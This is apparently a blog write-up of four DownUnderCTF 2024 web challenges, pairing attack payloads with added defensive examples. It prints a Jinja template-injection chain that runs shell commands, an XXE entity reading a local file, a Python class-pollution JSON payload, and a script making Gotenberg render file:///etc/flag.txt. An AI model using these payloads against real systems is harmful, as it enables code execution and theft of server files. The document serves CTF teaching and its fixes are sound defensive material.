DownUnderCTF 2024 web

parrot the emu

jinja ssti

```jinja
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='catch_warnings' %}
{{ c.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat flag').read()") }}
{% endif %}
{% endfor %}
```
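The bug behind this payload is that user input is concatenated into the template source, so Jinja evaluates it. Below is an added example (not code from the writeup or the challenge) showing that pattern beside the fix: keep the template constant and pass the input as a variable, so it is substituted and escaped but never evaluated. It assumes only that jinja2 is installed; the function names and the "Parrot says" template are made up for the demo.

```python
# Added example: the same Jinja usage in its vulnerable and fixed forms.
from jinja2 import Environment

env = Environment(autoescape=True)


def echo_unsafe(user_text: str) -> str:
    """Vulnerable: user input becomes part of the *template source*,
    so any {{ ... }} expression in it runs on the server."""
    return env.from_string("Parrot says: " + user_text).render()


# Fixed: the template is a constant compiled once; user input only ever
# arrives through the `text` variable, where it is HTML-escaped, not parsed.
PARROT_TEMPLATE = env.from_string("Parrot says: {{ text }}")


def echo_safe(user_text: str) -> str:
    return PARROT_TEMPLATE.render(text=user_text)


if __name__ == "__main__":
    probe = "{{ 7*7 }}"            # harmless expression-evaluation probe
    print(echo_unsafe(probe))      # evaluated -> "Parrot says: 49"
    print(echo_safe(probe))        # literal   -> "Parrot says: {{ 7*7 }}"
```

Treat `jinja2.sandbox.SandboxedEnvironment` as defence in depth only; it blocks `_`-prefixed attribute access, but the real fix is never to build template source from request data.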

zoo feedback form

xxe

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY flag SYSTEM "file:///app/flag.txt"> ]>
<root>
<feedback>&flag;</feedback>
</root>
```
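The feedback endpoint only needs a handful of elements, so the simplest mitigation is to refuse any document that declares a DOCTYPE at all; then no entity, internal or external, can ever be defined. Below is an added example (not the challenge's code) that does this with the standard library's expat parser before handing the document to ElementTree. The two sample documents are constructed for the demo.

```python
# Added example: reject DTDs before parsing feedback XML (stdlib only).
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXmlError(ValueError):
    """Raised when a document tries to declare a DTD / entities."""


def reject_dtd(xml_bytes: bytes) -> None:
    """Scan the document with expat and abort at the first DOCTYPE declaration."""
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXmlError(f"DOCTYPE {name!r} is not accepted")

    parser.StartDoctypeDeclHandler = on_doctype
    # Belt and braces: even if a DTD got through, never fetch external entities.
    parser.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0
    parser.Parse(xml_bytes, True)


def parse_feedback(xml_bytes: bytes) -> str:
    """Return the <feedback> text of a document that passed the DTD check."""
    reject_dtd(xml_bytes)
    root = ET.fromstring(xml_bytes)
    node = root.find("feedback")
    return node.text if node is not None and node.text else ""


def is_accepted(xml_bytes: bytes) -> bool:
    try:
        parse_feedback(xml_bytes)
        return True
    except UnsafeXmlError:
        return False


# Constructed samples: an ordinary submission and the DOCTYPE-bearing probe.
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<root><feedback>The emus were great</feedback></root>"""

DTD_PROBE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY flag SYSTEM "file:///app/flag.txt"> ]>
<root><feedback>&flag;</feedback></root>"""

if __name__ == "__main__":
    print(parse_feedback(BENIGN))   # The emus were great
    print(is_accepted(DTD_PROBE))   # False
```

If the application is built on lxml rather than the standard library, the equivalent setting is to construct the parser with `resolve_entities=False` and, ideally, `no_network=True` as well.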

co2

Python prototype-chain pollution.
Reference: https://www.cnblogs.com/Article-kelp/p/17068716.html
Source audit.
In routes.py:

```python
@app.route("/save_feedback", methods=["POST"])
@login_required
def save_feedback():
    data = json.loads(request.data)
    feedback = Feedback()
    # Because we want to dynamically grab the data and save it attributes we can merge it and it *should* create those attribs for the object.
    merge(data, feedback)
    save_feedback_to_disk(feedback)
    return jsonify({"success": "true"}), 200

@app.route("/get_flag")
@login_required
def get_flag():
    if flag == "true":
        return "DUCTF{NOT_THE_REAL_FLAG}"
    else:
        return "Nope"

@app.route("/api/update_user_data")
@login_required
def update_user_data():
    return "Coming Soon..."
```

`flag == "true"` yields the flag.
The `/save_feedback` route calls `merge` on the request body.

Through `merge` the `flag` attribute can be polluted to `"true"`:

```json
{"__class__":{"__init__":{"__globals__":{"flag":"true"}}}}
```
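The writeup does not show `merge` itself. The example below is added here (it is not the challenge's code) and assumes the recursive-merge shape described in the referenced article: it recurses into any attribute, including `__class__`, `__init__` and `__globals__`, so the JSON above rewrites a module global. Next to it is a hardened merge that only sets public attributes the instance already declares and refuses nested objects. `Feedback`, the module-level `flag` and the helper names are made up for the demo.

```python
# Added example: assumed vulnerable merge() beside a hardened one.
flag = "false"   # stands in for the module-level `flag` that /get_flag checks


class Feedback:
    def __init__(self):
        self.title = ""
        self.content = ""
        self.rating = 0


def merge_unsafe(src, dst):
    """Recursive merge with no key filtering (assumed shape of the vulnerable helper)."""
    for k, v in src.items():
        if hasattr(dst, "__getitem__"):              # dict-like target
            if dst.get(k) and isinstance(v, dict):
                merge_unsafe(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and isinstance(v, dict):
            # This branch walks instance -> __class__ -> __init__ -> __globals__
            merge_unsafe(v, getattr(dst, k))
        else:
            setattr(dst, k, v)


def merge_safe(src, dst):
    """Only set attributes the instance declares; never recurse, never touch dunders."""
    allowed = vars(dst)                               # attributes set in __init__
    for k, v in src.items():
        if not isinstance(k, str) or k.startswith("_") or k not in allowed:
            raise ValueError(f"rejected key {k!r}")
        if isinstance(v, dict):
            raise ValueError(f"nested objects not allowed for {k!r}")
        setattr(dst, k, v)


PAYLOAD = {"__class__": {"__init__": {"__globals__": {"flag": "true"}}}}  # from the writeup


def run_vulnerable() -> str:
    """Apply the payload with the unsafe merge; returns the module global afterwards."""
    global flag
    flag = "false"
    merge_unsafe(PAYLOAD, Feedback())
    return flag                                       # -> "true"


def run_hardened():
    """Apply the payload with the safe merge; returns (rejected, flag)."""
    global flag
    flag = "false"
    try:
        merge_safe(PAYLOAD, Feedback())
        rejected = False
    except ValueError:
        rejected = True
    return rejected, flag                             # -> (True, "false")


def run_benign():
    """The safe merge still handles an honest submission."""
    fb = Feedback()
    merge_safe({"title": "Emu enclosure", "rating": 5}, fb)
    return fb.title, fb.rating


if __name__ == "__main__":
    print(run_vulnerable(), run_hardened(), run_benign())
```

An allow-list of declared fields is the durable fix; merely blocking keys that start with `_` would still let a request overwrite methods or other attributes reachable by plain names.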


hah got em

The Dockerfile in the attachment uses the image:
gotenberg/gotenberg:8.0.3
Check past versions at https://github.com/gotenberg/gotenberg/releases

https://gotenberg.dev/docs/routes#convert-with-chromium
This gives the route /forms/chromium/convert/url

```python
import requests

URL = "https://web-hah-got-em-20ac16c4b909.2024.ductf.dev/"

r = requests.post(URL + "forms/chromium/convert/url",
                  files={
                      'url': (None, 'file://localhost/etc/flag.txt'),
                  })

# The response body is the rendered PDF; write it out for reading.
with open("res.pdf", "wb") as f:
    f.write(r.content)
```

http://example.com/2024/07/08/DownUnderCTF 2024 web/
Author: J_0k3r
Published: 8 July 2024
License: BY J_0K3R